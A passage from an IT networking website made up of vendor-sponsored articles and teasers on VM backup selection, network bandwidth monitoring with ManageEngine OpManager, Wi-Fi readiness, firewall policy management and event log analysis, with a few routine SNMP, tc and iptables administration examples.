Altaro aims to meet all of these business requirements through their VM Backup solution. Altaro supports all common storage types out of the box (Network Drive, NAS, iSCSI, eSATA and USB) with no advanced configuration required:

vm backup select backup location

Furthermore, all of the advanced features that you can think of are supported by Altaro VM Backup including Deduplication, WAN Optimisation, Guest Quiescing via VMware Tools and Instant Restore Technology to bring your backups online in just a few seconds, regardless of their size.

VM Backup - Billing Model & Price

There are various billing models out there these days. Most solutions will charge you a fee per server CPU or by the number of Virtual Machines. Then there is usually a maintenance fee on top which covers support and entitlement to new versions of the software.

With various options available, work out whether a per-CPU or per-VM option is more advantageous for your business. This applies for the long term, so forecast this pricing out over 3 or 5 years. It might also be a good time to see if you can consolidate your Virtual Machines down onto fewer hosts and go for a host-oriented option rather than per VM.

It would also be wise to look into deals on longer-term agreements and, if you have a large estate, to see if there are discounts for signing up to a larger commitment.

Some vendors will offer an OPEX model rather than a fixed price upfront CAPEX solution. Paying monthly can help with budgets so check with your vendor about the options.

When we look at Altaro VM Backup, the billing model is simple; all you need is the number of hosts in your environment and the edition of the software you wish to purchase. 24/7 support and upgrades are included for the first year too; you can purchase software maintenance agreements (SMA) for continued upgrade and technical support in future years. Altaro does not bill you on the number of VMs or sockets, so you can leverage a cost saving over the competition here.

VM Backup – Security & Encryption

Security is a growing concern, so don’t fall into the trap of forgetting about it when looking at your backup solution:

  • Check to ensure your chosen solution’s backups can put an air gap in place for your production Virtual Machines to prevent the spread of threats such as crypto-locker to your backups.
  • Do you need to encrypt your VM backups? This can slow down your backup jobs and prevent some features from working so ask your shortlisted vendors what the deal is here.
  • For ultra security-conscious businesses, you might want your backups to be encrypted as the data is sent down the network to your storage device. This can be advantageous, but there are sometimes cheaper options such as using a VPN or a dedicated VLAN to help protect you to a certain degree.
  • Backup software such as Altaro includes a built-in encryption feature that encrypts all backups with AES 256-bit (military-grade) encryption. This removes the need to encrypt backups manually, a practice that can render them inaccessible even to the backup solution itself.

Try Altaro's Free VM Backup Solution - Download Now

Vendor Reputation

Before signing up to a contract with a backup vendor, ask yourself the following questions:

  • How long has the company been in business?
  • How many versions of the software have been released?
  • Is the software supported by your virtualization vendor (VMware, Hyper-V etc.)?
  • How quickly does the backup vendor’s software support a recently released update from your Virtualization vendor?

For peace of mind, Altaro wins awards every year, which are published on its website. It has over 30 awards to its name and a series of impressive independent reviews. Altaro also boasts over 50,000 customers including:

altaro vm backup customers

Vendor Support

When things go wrong and you have to rely on your backup solution to save the day, you need to know that the vendor support is ready to help you should you need them. Here are some things to consider:

Support Reviews

Look online to see if there are any reviews on the solution you are looking at purchasing.

A quick Google search should be all you need to see if there are any major issues with the software.

Service Level Agreements

When you receive your terms, review the support clauses to see if the SLAs are in line with your expectations. Ideally, you want the vendor to respond fairly quickly to your support requests especially if they are related to a restore.

Support Availability

For availability, the two main areas for consideration are:

  • Can you phone or email the support team?

Being able to call the support team is important because other methods such as email and chat are slow and might be triaged for several hours or misclassified into another severity level. Phone support is incredibly important when looking at your options.

  • Support hours

It always feels as though we need support at the worst possible time. Trying to get an application or Virtual Machine restore completed through the evening so that it is ready for the morning can be a challenge. With this in mind, we should try to choose a VM backup vendor that has a 24/7 helpdesk who you can call at any time and log a case.


One of the great things about Altaro is their support. They commit to responding to support calls in under 30 seconds. Guaranteed!

altaro customer support

Summary

This article helped identify the main considerations for your VM Backup solution to ensure business continuity, data integrity, data availability and more. We talked about the importance of the number of VMs and Hosts supported by the VM backup, the types of backup storage supported, advanced storage space conservation techniques such as Augmented Inline Deduplication, WAN Optimization techniques to maximise your backups over WAN links, Guest Quiescing for database backups, Instant Restore capabilities for fast restoration, VM billing and pricing models, VM backup security and encryption, and vendor support.

We believe that Altaro fits the needs of most organisations due to its scalable, feature-rich solution. With an average call pickup time of only 22 seconds, putting you straight through to a product expert with no gatekeepers in the way, the support experience alone is enough for most to consider Altaro a viable solution.

AIOPS for IT Operations

Artificial Intelligence For IT Operations (AIOps) - Why You Should Care (or not)

aiops for it operations intro
In the rapidly evolving landscape of IT operations, organizations are increasingly turning to Artificial Intelligence for IT Operations (AIOps) to streamline their processes, enhance efficiency, and overcome the challenges of managing complex and dynamic IT environments.

AIOps combines artificial intelligence, machine learning, and big data analytics to deliver powerful insights and automation capabilities that drive transformative benefits. In this article we'll explore the significance of AIOps in the modern IT era.

Key Topics:

Download your free complete guide to Artificial Intelligence for IT Operations.

aiops abstract architecture
AIOps abstract architecture (Free ManageEngine Whitepaper) - click to enlarge

Proactive Problem Resolution

AIOps enables organizations to move away from reactive approaches to IT management. By leveraging machine learning algorithms and advanced analytics, AIOps can identify patterns, anomalies, and potential issues in real-time. This proactive approach empowers IT teams to address problems before they impact end-users, improving system availability, and reducing mean-time-to-resolution.

aiops event noise filtering
Event noise filtering with the help of AIOps (Free ManageEngine Whitepaper)

Continue reading


Network Management Systems Help Businesses Accurately Monitor Important Application Performance, Infrastructure Metrics, Bandwidth, SLA Breaches, Delay, Jitter and more

Accurately monitoring your organization’s business application performance, service provider SLA breaches, network infrastructure traffic, bandwidth availability, Wi-Fi capacity, packet loss, delay, jitter and other important metrics throughout the network is a big challenge for IT Departments and IT Managers. Generating meaningful reports for management with the ability to focus on specific metrics or details can make it an impossible task without the right Network Management System.

The continuous demand for business network infrastructures to support more applications, protocols and services without interruption has placed IT departments, IT Managers and, subsequently, the infrastructure they manage under tremendous pressure. Knowing when the infrastructure is reaching its capacity and planning ahead for necessary upgrades is a safe strategy most IT Departments try to follow.

The statistics provided by the Cisco Visual Networking Index (VNI) Forecast predict exponential growth in bandwidth requirements over the coming five years:

cisco visual networking index forecast

These types of reports, along with the exponential growth of bandwidth and speed requirements for companies of all sizes, raise a few important questions for IT Managers, Network Administrators and Engineers:

  • Is your network ready to accommodate near-future demanding bandwidth requirements?
  • Is your current LAN infrastructure, WAN and Internet bandwidth sufficient to efficiently deliver business-critical applications, services and new technologies such as IoT, Wi-Fi - 802.11n and HD Video?
  • Do you really receive the bandwidth and SLA that you have signed for with your internet service provider or are the links underutilized and you are paying for expensive bandwidth that you don’t need?
  • Do you have the tools to monitor network conditions prior to potential issues becoming serious problems that impact your business?

All these questions and many more are discussed in this article aiming to help businesses and IT staff understand the requirements and impact of these technologies on the organization’s network and security infrastructure.

We show solutions that can be used to help obtain important metrics, monitor and uncover bottlenecks, SLA breaches, security events and other critical information.

Key Topics:

Finally, we must point out that basic knowledge of networking and design concepts is recommended for this article.

Click to Discover how a Network Management System can help Monitor your Network, SLAs, Delay Jitter and more.

Network Performance Metrics and their Bandwidth Impact

Network performance metrics vary from business to business and provide the mechanism by which an organization measures critical success factors.

The most important performance metrics for business networks are as follows:

  • Connectivity (one-way)
  • Delay (both round-trip and one-way)
  • Packet loss (one-way)
  • Jitter (one-way) or delay variation
  • Service response time
  • Measurable SLA metrics

Bandwidth is one of the most critical variables of an IT infrastructure and can have a major impact on all the aforementioned performance metrics. Oversaturated links can cause poor network performance with high packet loss, excessive delay and jitter, which can result in lost productivity and revenue, and increased operational costs.

New Applications and Bandwidth Requirements

This rapid growth in bandwidth demand affects enterprises and service providers, which are continually challenged to efficiently deliver business-critical applications and services while running a network at optimum performance. The necessity for more expensive bandwidth solutions is one of the crucial factors that may have a major impact on network and application performance. Let’s have a quick look at the new technologies with high bandwidth needs which require careful bandwidth and infrastructure planning:

High Definition (HD) Video Bandwidth Requirements

HD video surpassed standard definition by the end of 2011. User demand for HD video has a major impact on a network due to its demanding bandwidth requirements, as clearly displayed below:

dvd 720 1080p bandwidth requirements

DVD, 720p HD and 1080p HD bandwidth requirements:

  • (H.264) 720p HD video requires around 2.5 Mbps, or twice as much bandwidth as (H.263) DVD
  • (H.264) 1080p HD video requires around 5 Mbps, or twice as much bandwidth as (H.264) 720p
  • Ultra HD 4320p video requires around 20 Mbps, or four times as much bandwidth as (H.264) 1080p

BYOD and 802.11ac Bandwidth Requirements

802.11ac is the next generation of Wi-Fi. It is designed to give enterprises the tools to meet the demands of BYOD access, high bandwidth applications, and the always-on connected user. The 802.11ac IEEE standard allows for theoretical speeds up to 6.9 Gbps in the 5-GHz band, or 11.5 times those of 802.11n!

Taking into consideration the growing trend and adoption of Bring-Your-Own-Device (BYOD) access, it won’t be long until multi-gigabit Wi-Fi speeds will become necessary.

Virtual Desktop Infrastructure (VDI) Bandwidth Requirements

Each desktop delivered over the WAN can consume up to 1 Mbps of bandwidth, and considerably more when employees access streaming video. In companies with many virtual desktops, traffic can quickly exceed existing WAN capacity, noticeably degrading the user experience.
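
As a rough, back-of-the-envelope illustration (the figures are assumptions, not vendor guidance): a branch office with 200 concurrent virtual desktops at 1 Mbps each already needs about 200 Mbps of WAN capacity before any streaming video is factored in, so a 100 Mbps link would be saturated at roughly half that user count.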

Cloud IP Traffic Statistics

Annual global cloud IP traffic will reach 14.1 ZB (1.2 zettabytes per month) by the end of 2020, up from 3.9 ZB per year (321 exabytes per month) in 2015.
Annual global data center IP traffic will reach 15.3 ZB (1.3 ZB per month) by the end of 2020, up from 4.7 ZB per year (390 EB per month) in 2015. These forecasts are provided by the Cisco Global Cloud Index (GCI), an ongoing effort to forecast the growth of global data center and cloud-based IP traffic.

Application Bandwidth Requirements and Traffic Patterns

Bandwidth requirements and traffic patterns vary between applications and need careful planning, as displayed below:


Data, Video, Voice and VDI bandwidth requirements & traffic patterns

An effective strategy is essential in order to monitor network conditions prior to potential issues becoming serious problems. Poor network performance can result in lost productivity, revenue, and increased operational costs. Hence, detailed monitoring and tracking of a network, applications, and users are essential in optimizing network performance.

Network Monitoring Systems (NMS) for Bandwidth Monitoring

An NMS solution needs to keep track of what is going on in terms of link bandwidth utilization and whether it is within the normal (baseline) limits. In addition, network and device monitoring helps network operators optimize device security, either proactively or through a fast, reactive approach. Standard monitoring protocols such as Simple Network Management Protocol (SNMP) and NetFlow make the raw data needed to diagnose problems readily available. Finally, historical network statistics are an important input to the calculations when planning for a bandwidth upgrade.

SNMP can easily provide essential network device information, including bandwidth utilization. In particular, the NMS can monitor bandwidth performance metrics such as backplane utilization, buffer hits/misses, dropped packets, CRC errors, interface collisions, interface input/output bits, & much more periodically via SNMP.

Network devices can be monitored via SNMP v1, 2c or 3 to deliver bandwidth utilization for both inbound and outbound traffic. An XML API can be used to monitor and collect bandwidth statistics from supported devices such as the Cisco UCS Manager. In addition, network maps with bandwidth utilization graphs can visualize the flow of bandwidth and spot bottlenecks at a glance.
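
As a rough illustration of the kind of polling an NMS performs under the hood, the standard Net-SNMP command-line tools can read the same interface counters. The device IP, community string and interface index below are hypothetical:

# snmpget -v2c -c public 192.0.2.1 IF-MIB::ifHCInOctets.3 IF-MIB::ifHCOutOctets.3

Polling the two 64-bit octet counters again after a fixed interval (say 300 seconds) and taking the difference gives the traffic rate; utilization is then (delta octets x 8 x 100) / (interval in seconds x interface speed in bits per second). An NMS such as OpManager simply automates this polling, stores the history and draws the graphs for you.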

Bandwidth issues reported by users regarding delays and slow application response times cannot be identified with SNMP-based information alone. This requires technologies such as Cisco NBAR, NetFlow, Juniper J-Flow, IPFIX, sFlow, Huawei NetStream or CBQoS to understand bandwidth utilization across applications, users and devices. With these technologies, it is possible to perform in-depth traffic analysis and determine in detail the who, what, when and where of bandwidth usage.

Finally, performance thresholds and reporting topN devices with specific characteristics (TopN reporting) are useful, both for noticing when capacity is running out, and for easily correlating service slowness with stressed network or server resources. Those metrics can be the first indication of an outage, or of potential SLA deterioration to the point where it affects delivery of services.

ManageEngine OpManager 12 NMS Features

OpManager is the NMS product offered by ManageEngine. OpManager can be easily installed and deployed, and provides all the visibility and control that you need over your network.

In brief, it offers the following main features:

  • Physical and virtual server monitoring
  • Flow-based bandwidth analysis
  • Firewall log analysis and archiving
  • Configuration and change management
  • IP address and switch port management

The tools mentioned below provide in-depth visibility into network bandwidth performance. They can help you prepare your network for the deployment of new technologies and measure the network performance metrics discussed in the previous sections. In particular, OpManager offers the following tools to achieve complete network bandwidth visibility:

Bandwidth Monitoring: Tracks network bandwidth usage in real time and provides information on the top users consuming bandwidth on the network.

Router Traffic Monitoring: Continuously monitors networking devices using flows and generates critical information to ensure proper network bandwidth usage.

Cisco AVC Monitoring: in-depth visibility on the bandwidth consumption per application. Ensure business critical applications get maximum priority. Forecast future bandwidth needs and prepare your network before deploying new services and technologies.

Advanced Security Analytics Module: Detect threats and attacks using continuous Stream Mining Engine technology. This ensures high network security and a method to detect and eliminate network intruders.

Cisco IPSLA Monitoring: Monitor critical metrics affecting VoIP, HD Video performance, VDI and ensure best-in-class service levels. Ensure seamless WAN connectivity through WAN RTT monitoring.

Cisco NBAR Reporting: Recognize a wide variety of applications that use dynamic ports. Classify and take appropriate actions on business critical and non-critical applications.

ManageEngine OpManager 12 Trial Version Installation

The installation of the OpManager 12 trial version is discussed in this section. The installation is very simple and fast; it didn’t take us more than 5 minutes to complete.

Two options are provided during the installation:

  • 30-day trial without any limitation on the number of devices and interfaces
  • Free edition where you can monitor up to 10 devices

We installed the 30-day trial version. You can easily uninstall the trial version in less than 2 minutes after the product evaluation, by following the OpManager uninstall wizard. Let’s rock!

We start by downloading the Windows or Linux installation file of OpManager from the following link:

opmanager download

Downloading OpManager for Windows or Linux systems (Click to download)

Once downloaded run the file to initiate the Install Wizard which guides us through the installation process.

After accepting the license agreement, it is necessary to select the installation mode in order to test ManageEngine OpManager 12. We selected the 30-day trial version, which is more than enough for an evaluation:

 opmanager installation trial free edition

Selecting between OpManager 30 Day Trial or Free Edition

Next, we select the language and path for the installation followed by the recommended ports required for OpManager. In particular, port 80 is the default server port of OpManager and port 9996 is the default port to listen for netflow packets. The ports can be easily changed during the installation.
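
If you want to be sure nothing else is already bound to these ports before the installation (a quick, hedged check on a Linux host; on Windows, netstat offers the equivalent):

# ss -tulnp | grep -E ':(80|9996)\b'

No output means both the web server port (TCP 80) and the NetFlow listener port (UDP 9996) are free to use.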

 opmanager webserver and netflow ports

Selecting and changing OpManager WebServer and NetFlow ports

Next, we skip the Registration for Technical Support since we don’t require it for the evaluation of the product. OpManager will now commence its installation process.

When the file copy process is complete, we are prompted to select whether we are installing a Primary or Standby server. Redundancy is not required for our product evaluation:


Selecting between Primary and Standby OpManager Installation

The next option allows OpManager to be installed with either MS SQL or PostgreSQL, the latter being the fastest installation option. PostgreSQL is bundled with the product and is a great option for evaluations:


Selecting between OpManager with PostgreSQL or MSSQL

We managed to complete the installation process in less than 3 minutes!

As soon as we hit the Finish button, the initialization of the modules starts. Meanwhile we can take a quick look at the Readme file which includes useful information about the product.

OpManager launches in less than a minute after completing its initialization. The welcome tour introduces us to the main functionalities of the product:


OpManager’s welcome tour

We are now ready to start working with and exploring the product. You can begin by discovering your network devices. It is a powerful tool with plenty of capabilities.


OpManager Network Device Discovery

Selecting the Overview tab from the left column, we see (screenshot below) useful information about Network, Server, Virtualization, NetFlow, Network Configuration Management (NCM), Firewall and IP Address Management (IPAM). These are all the essential components that should be monitored in a network:

NOTE: The single discovered device shown is by default the Server where OpManager is installed.


OpManager discovered devices and network view

All installed features and application add-ons enabled for the 30-day evaluation period are shown:

OpManager installed options and product details

Summary

Bandwidth availability is a critical factor that has a major impact on a network and also affects application performance. The introduction of new IT technologies and policies, such as BYOD and HD video, requires careful planning, provisioning and monitoring by a sophisticated, reputable NMS. The NMS should not only monitor bandwidth utilization but also perform in-depth traffic analysis and determine in detail the who, what, when and where of bandwidth usage. OpManager 12 is an NMS solution that includes all the tools for bandwidth and application monitoring by utilizing NBAR, NetFlow, SNMP and XML-API technologies, helping IT Departments and IT Managers gain centralized visibility of their network that was previously impossible.


Ensuring Enterprise Network Readiness for Mobile Users – Wi-Fi, Bandwidth Monitoring, Shadow IT, Security, Alerts

enterprise-network-monitoring-management-wifi-security-mobility-1a
Demands on Enterprise networks to properly support mobile users are on a continuous rise, making it more necessary than ever for IT departments to provide high-quality services to their users. This article covers 4 key areas affecting mobile users and Enterprise networks: Wi-Fi coverage (signal strength and signal-to-noise ratio), Bandwidth Monitoring (Wi-Fi links, network backbone, routers, congestion), Shadow IT (usage of unauthorized apps) and security breaches.

Today, users are no longer tied to their desktops and laptops; they are mobile. They can reply to important business emails, access their CRM, collaborate with peers, share files with each other and much more from the cafeteria or the car park. This means it is high time for network admins at enterprises to give wireless networks the same importance as wired networks. Wireless networks should be just as fast and secure.

Though the use of mobile devices for business activities is a good thing for both enterprises and their customers, it also has some drawbacks on the network management side. The top 4 things to consider to make your network mobile-ready are:

  • Wi-Fi signal strength
  • Bandwidth congestion
  • Shadow IT
  • Security breaches and attacks

enterprise-network-monitoring-management-wifi-security-mobility-1
Figure 1. OpManager Network Management and Monitoring - Click for Free Download

Wi-Fi Signal Strength

A good Wi-Fi signal is a must throughout the campus. Employees should not experience connectivity problems or slowness because of poor signal quality; the signal should be comparable to that provided by mobile carriers. However, it is not easy to maintain good signal strength throughout an entire building. Apart from the Wireless LAN Controller (WLC) and Wireless Access Points (WAPs), channel interference also plays a major role in Wi-Fi signal strength.

RF interference is the noise or interference caused by other wireless and Bluetooth devices, such as phones, mice and remote controls, that disrupts the Wi-Fi signal. Since all these devices operate on the same 2.4 GHz and 5 GHz frequencies, they degrade Wi-Fi signal strength. When a client device receives another Wi-Fi signal it will defer transmission until the signal ceases. Interference that occurs during transmission also causes packet loss. As a result, Wi-Fi retransmissions take place, which slow down throughput and result in wildly fluctuating performance for all users sharing a given access point (AP).

Download your free copy of OpManager - Manage and Monitor your network

A common metric for measuring Wi-Fi signal strength is the Signal-to-Noise Ratio (SNR). SNR is the ratio of signal power to noise power, expressed in decibels (dB). An SNR of 41 dB is considered excellent, while 10-15 dB is considered poor. However, as soon as interference is experienced, SINR is the metric to look for. SINR is the Signal-to-Interference-plus-Noise Ratio, which provides the difference between the signal level and the combined level of interference and noise. Since RF interference disrupts user throughput, SINR reflects the real performance level of the Wi-Fi system. A higher SINR is better, as it indicates higher achievable data rates.
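
A short worked example (the figures are illustrative assumptions): an access point signal measured at -55 dBm against a noise floor of -95 dBm gives an SNR of -55 - (-95) = 40 dB, which is excellent. If a neighbouring network raises the combined interference-plus-noise floor to -85 dBm, the SINR for the same signal drops to -55 - (-85) = 30 dB, so the client will negotiate lower data rates even though the raw signal strength has not changed.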

enterprise-network-monitoring-management-wifi-security-mobility-2
Figure 2. OpManager: Network Analysis – Alarms, Warnings and Statistics - Click for Free Download

Shadow IT

Employees using third-party apps or services without the knowledge of IT in order to get their job done is known as Shadow IT. Though it lets employees choose the apps or services that work for them and be productive, it also leads to conflicts and security issues. Using apps that have not been vetted by the IT team may cause serious security breaches and may even lead to the loss of corporate data.

It's tough to restrict Shadow IT because employees keep finding apps and services that they are comfortable with or find easy to work with. Satisfied users then spread them by word of mouth, increasing adoption among their peers. Sometimes this conflicts with existing IT policy and slows down operations. Nevertheless, the adoption of Shadow IT is on the rise: according to one study, Shadow IT exists in more than 75% of enterprises and is expected to grow further.

Security Breach & Attacks

Public Wi-Fi hotspots are favorites for hackers, who try to steal data from the mobile devices that connect to them. A few years back The Guardian, a UK-based newspaper, deployed a mock Wi-Fi hotspot at an airport to demonstrate how critical information such as email addresses, passwords and credit card data can be stolen over a Wi-Fi connection. Many travelers connected to the hotspot and entered their details, which fraudsters could have misused had it been a real attack.

enterprise-network-monitoring-management-wifi-security-mobility-3
Figure 3. OpManager: Network Bandwidth, QoS and Policy Utilization - Click for Free Download

It is nearly impossible for employees, or indeed for anyone, to refrain from connecting to public Wi-Fi when travelling or in public places. However, hackers use public Wi-Fi to inject malicious code that acts as a Trojan, which in turn helps them steal corporate data.

Bandwidth Congestion

Admins have little control over employees using their mobile devices for personal purposes as well, which includes accessing sites such as Facebook, WhatsApp, YouTube and Twitter. They cannot restrict this entirely, as the world is becoming more social, at least online, and such apps have to be allowed. However, this should not take a toll on employees accessing business-critical apps.

Buying additional bandwidth is the usual approach to solving a bandwidth crisis. However, that is not an effective way to manage bandwidth in enterprise networks, and most enterprises already spend heavily on it. According to a survey we conducted among Cisco Live US 2015 attendees, 52% of them spend more than $25,000 per month on bandwidth.

Effective Wireless Network Management Is The Need Of The Hour

Wireless LAN Controllers (WLCs) and Wireless Access Points (WAPs) form the backbone of a wireless network. It is imperative to monitor them proactively so that any performance issues can be resolved before they grow and impact users. Critical metrics such as SNR and SINR also have to be monitored in real time so that any degradation in signal strength can be quickly identified and fixed. Heat maps play a critical role in visually representing signal strength across a floor; display them on NOC screens so that any signal problem can be spotted in real time.

Strict firewall and security policies combined with effective firewall management protect enterprises from attacks and breaches caused by hackers and Shadow IT. To solve bandwidth-related issues, network admins can use traffic shaping techniques to prioritize bandwidth for business-critical apps, as sketched below. This avoids frequently buying additional bandwidth and helps provide adequate bandwidth for business-critical apps and minimum bandwidth for non-business-critical apps.
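
As a minimal sketch of the traffic-shaping idea, here is a Linux tc (HTB) example used purely as an illustration; on enterprise gear the same policy would normally be expressed through the router's or WLC's QoS features, and the interface name, rates and port below are assumptions:

# tc qdisc add dev eth0 root handle 1: htb default 20
# tc class add dev eth0 parent 1: classid 1:10 htb rate 50mbit ceil 100mbit
# tc class add dev eth0 parent 1: classid 1:20 htb rate 10mbit ceil 100mbit
# tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dport 443 0xffff flowid 1:10

Here traffic to port 443 (assumed to represent the business-critical apps) is guaranteed 50 Mbit/s, while everything else falls into the default class with a 10 Mbit/s guarantee; both classes can borrow up to the full 100 Mbit/s link when it is idle.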

Doing all of this manually would be highly cumbersome. Look for tools or solutions that offer proactive monitoring of wireless networks, provide heat maps to identify and measure Wi-Fi signal strength, manage firewall configurations and policies, and troubleshoot bandwidth-related issues. With such a solution and strict security policies in place, you can make your network ready for mobile devices.

ManageEngine OpManager is one such network management software package that offers increased visibility and greater control over your network. Out of the box it offers network monitoring, physical and virtual server monitoring, flow-based bandwidth analysis, firewall log analysis and archiving, configuration and change management, and IP address and switch port management, in one single executable. You can also monitor Wi-Fi signal strength from within the product.

Managing Complex Firewall Security Policies

Challenges & Solutions to Managing Firewall Rules in Complex Network Environments

firewall security rules policy management
In today's interconnected digital landscape, where businesses rely heavily on networked systems and the internet for their operations, the importance of cybersecurity cannot be overstated. Among the essential tools in a cybersecurity arsenal, firewalls stand as a frontline defense against cyber threats and malicious actors.

One of the primary functions of a firewall is to filter traffic, which entails scrutinizing packets of data to determine whether they meet the criteria set by the organization's security policies. This process involves examining various attributes of the data packets, such as source and destination IP addresses, port numbers, and protocols. By enforcing these rules, firewalls can thwart a wide range of cyber threats, including unauthorized access attempts, malware infections, denial-of-service attacks and more.

Enforcing and managing firewall rules effectively can be a daunting task, particularly in complex network environments with numerous rules, policies and configurations. While solutions like ManageEngine Firewall Analyzer step in to offer a comprehensive way to streamline firewall rule management and enhance security posture, it is worthwhile taking a look at the real challenges firewall rule management presents across all well-known platforms such as Cisco (FTD, Firepower, ASA), Palo Alto Next-Gen firewalls, Check Point, Fortinet, Juniper and more.

Key Topics:

Challenges with Firewall Rule Management

Continue reading

Dealing with Security Audit Challenges

Dealing with Security Audit Challenges: Discovering vulnerabilities, unauthorized access, optimize network security & reporting

manageengine firewall analyzer - dealing with security audit challenges
The utilization of log analyzers, such as Firewall Analyzer, in network infrastructure plays a pivotal role in enhancing cybersecurity and fortifying the overall security posture of an organization. Security audits, facilitated by log analyzers, serve as a critical mechanism for systematically reviewing and analyzing recorded events within the network.

This proactive approach enables the identification of potential security risks, unauthorized access attempts, and abnormal activities that might signify a breach. The log analyzer sifts through vast amounts of data & logs, providing insights into patterns and anomalies that might go unnoticed otherwise.

By uncovering vulnerabilities and irregularities, organizations can take timely corrective actions, preventing potential security breaches. Moreover, the information gleaned from these audits is instrumental in formulating a comprehensive security strategy that extends across the entire network infrastructure.

ManageEngine Firewall Analyzer dashboard
ManageEngine Firewall Analyzer dashboard (click to enlarge)

This strategic approach ensures a holistic defense against cyber threats, fostering a resilient and adaptive cybersecurity framework that aligns with the evolving landscape of security challenges.

This article will delve into the concept of security audits and how a product like Firewall Analyzer can streamline this crucial procedure.

Key Topics:

Download your copy of ManageEngine's popular Firewall Analyzer here.

Security Audits Explained

Continue reading

Compliance in a Hybrid Work Environment

Ensuring Compliance and Business Continuity in a Hybrid Work Environment

compliance in a hybrid environment
In the wake of digital transformation, the work landscape as we know it has undergone a dynamic shift. People can now work from home, from the office, or anywhere with a stable internet connection. Labeled hybrid work, this seamless blend of remote work and on-site engagement has gradually been adopted by organizations.

According to the digital readiness survey by ManageEngine, remote work will have a lasting impact, with 96% of organizations stating that they will be supporting remote workers for at least the next two years. While the remote working model offers significant advantages to employees, such as a better work-life balance, it presents significant challenges for organizations in extending office-like network security.

To ensure the success of hybrid work, every organization should address challenges related to security, compliance, and data protection. This article delves into the risks and issues associated with ensuring compliance in a hybrid work environment. Let's dive in.

Key Topics:

Network Compliance in a Hybrid Work Environment

Compliance refers to the adherence of an organization's infrastructure, configuration, and policies to industry standards. In a hybrid work environment where employees are working away from the office, it becomes difficult to ensure compliance. To overcome this, companies are employing a range of smart monitoring systems to make sure they stay compliant with industry norms.

Besides legal obligation, compliance also helps in safeguarding networks from security incidents such as breach attempts, overlooked vulnerabilities, and other operational inefficiencies.

Consequences of Compliance Violations

Non-compliance, which refers to the failure to adhere to laws, regulations, or established guidelines, can have a wide range of repercussions that vary depending on several factors. The severity of these consequences is often determined by the nature and extent of the violation, the specific mandate or regulation that has been breached, and the subsequent impact on various stakeholders involved. Here, we delve into the potential consequences of non-compliance in more detail:

Continue reading

Firewall Analyzer Management Tool

Discover the Ultimate Firewall Management Tool: 7 Essential Features for Unleashing Unrivaled Network Security!

The Ultimate Firewall Management Tool
Firewall security management is a combination of monitoring, configuring, and managing your firewall to make sure it runs at its best to effectively ward off network security threats. In this article, we will explore the seven must-have features of a firewall security management tool and introduce Firewall Analyzer, a popular firewall management tool that has set the gold standard in firewall management across all vendors of firewall and security products. Furthermore, we'll explain how central firewall policy management, VPN management, log analysis, log retention, compliance management and threat identification/forensics help create a robust cybersecurity and network security posture that increases your organization's ability to protect its networks, information, and systems from threats.

The seven must-have features of a firewall security management tool are:

  1. Firewall Policy Management
  2. VPN Management
  3. Firewall Change Management
  4. Compliance Management
  5. Log Analysis & Threat Identification
  6. Log Retention & Forensics
  7. Network Security Alerts

Let’s take a look at each of these features and provide examples that showcase their importance.

Firewall Policy Management

This is the process of managing and organizing your firewall rules. These firewall rules and policies dictate the traffic that is entering and exiting your network, and can also be used to block illegitimate traffic.

Why is this important? Effective firewall policy management ensures firewall policies never become outdated, redundant, or misconfigured, which would leave the network open to attack.

One of the primary challenges in firewall policy management is the potential for human error. Configuring firewall rules and policies requires a deep understanding of network architecture, application requirements, and security best practices. Unfortunately, even experienced IT professionals can make mistakes due to various factors, such as time constraints, lack of communication, or a misunderstanding of the network's specific needs.

Different individuals within an organization may also have different levels of expertise and understanding when it comes to firewall policies. This diversity in knowledge and experience can lead to inconsistencies, redundant rules, or conflicting configurations, compromising the firewall's overall effectiveness.
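
To make the problem of conflicting or redundant rules concrete, here is a minimal, hypothetical illustration using Linux iptables (the addresses are documentation examples; any vendor's rule base can exhibit the same ordering mistake):

# iptables -A FORWARD -p tcp -d 203.0.113.10 --dport 80 -j ACCEPT
# iptables -A FORWARD -p tcp -s 198.51.100.5 -d 203.0.113.10 --dport 80 -j DROP

Because rules are evaluated top-down and the first match wins, the specific DROP rule is "shadowed" by the broader ACCEPT above it and will never fire; this is exactly the kind of anomaly a policy analysis tool is designed to flag.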

Taking proactive steps to manage firewall policies effectively can significantly enhance an organization's security posture and protect valuable assets from potential breaches and cyberattacks. This is where solutions such as Firewall Analyzer can take on the burden of managing firewall policies through an intuitive, simplified and easy-to-follow interface, no matter which firewall vendor you are dealing with.

A few of the key features offered by Firewall Analyzer include:

  • Gain enhanced visibility on all the rules in your firewall and a comprehensive understanding of your security posture.
  • Quickly identify and record anomalies in redundant, generalized, correlated, shadowed, or grouped rules.
  • Analyze firewall policies and get suggestions on changes to rule order to optimize performance.
  • Simplify the rule creation, modification, and deletion process.
  • Check the impact of a new rule on the existing rule set.

Continue reading

Windows Server Threat Detection

Detecting Windows Server Security Threats with Advanced Event Log Analyzers

Windows Server Threat Detection
Windows Servers stand as prime targets for hackers and malicious actors due to their widespread usage and historical vulnerabilities. These systems often serve as the backbone for critical business operations, housing sensitive data and facilitating essential services. However, their prevalence also makes them vulnerable to cyber threats, including ransomware attacks, distributed denial-of-service (DDoS) assaults and more.

Windows Servers have a documented history of vulnerabilities and exploits, which further intensifies their attractiveness to attackers seeking to exploit weaknesses for unauthorized access or data theft. Consequently, it is paramount for organizations to prioritize mitigating these risks and safeguarding the integrity and continuity of operations within Windows Server environments.

Fortunately, tools like EventLog Analyzer offer robust capabilities for automatically identifying and countering such threats, uplifting the security posture of Windows Server setups. To effectively leverage these defenses, it's imperative to understand the nature of common Windows server threats and how they manifest. In this document, we delve into several prevalent threats targeting Windows servers and outline strategies for their detection and mitigation.

Furthermore, implementing robust security measures, such as regular patching, network segmentation, intrusion detection systems, data encryption and Windows VM backups, is essential to fortify Windows Servers against potential threats and ensure the resilience of critical business functions.

Key Topics:

Download now the world’s leading Event Log Management System.

Common Windows Server Threats


Continue reading

Event Log Monitoring System

Event Log Monitoring System: Implementation, Challenges & Standards Compliance. Enhance Your Cybersecurity Posture

eventlog analyzer
An event log monitoring system, often referred to as event log management, is a critical component of IT security and management that helps organizations strengthen their cybersecurity posture. It is a sophisticated software solution designed to capture, analyze, and interpret the vast array of event logs generated by the various components of an organization's IT infrastructure, such as firewalls (Cisco ASA, Palo Alto etc.), routers, switches, wireless controllers, Windows servers, Exchange servers and more.

These event logs can include data on user activities, system events, network traffic, security incidents and more. By centralizing and scrutinizing these logs in real time, event log monitoring systems play a pivotal role in enhancing an organization's security posture, enabling proactive threat detection, and facilitating compliance with regulatory requirements.

Key Topics:

